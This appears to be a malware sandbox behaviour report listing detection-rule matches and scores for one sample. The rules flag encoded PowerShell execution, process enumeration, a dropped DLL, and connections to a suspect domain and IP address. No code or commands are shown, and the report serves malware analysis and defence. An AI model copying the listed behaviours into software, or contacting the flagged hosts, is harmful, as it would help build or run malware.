vmray_request_dns_by_name
Resolves host name "zaratoons.info".
Performs DNS request
Network
VTI rule match with VTI rule score 3/5
vmray_read_net_adapter_addresses_by_api
Reads the network adapters' addresses by API.
Reads network adapter information
Process
VTI rule match with VTI rule score 1/5
vmray_enumerate_processes
Enumerates running processes.
Enumerates running processes
Process
VTI rule match with VTI rule score 4/5
vmray_execute_encoded_powershell_script
Executes encoded PowerShell script to possibly hide malicious payload.
Executes encoded PowerShell script
Network
VTI rule match with VTI rule score 1/5
vmray_tcp_out_connection
Outgoing TCP connection to host "212.73.150.207:443".
Connects to remote host
Network
VTI rule match with VTI rule score 2/5
vmray_establish_http_connection
URL "https://www.google.com".
Connects to HTTP server
PE
VTI rule match with VTI rule score 2/5
vmray_drop_pe_file
Drops file "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\vThQexNegi.dll".
Drops PE file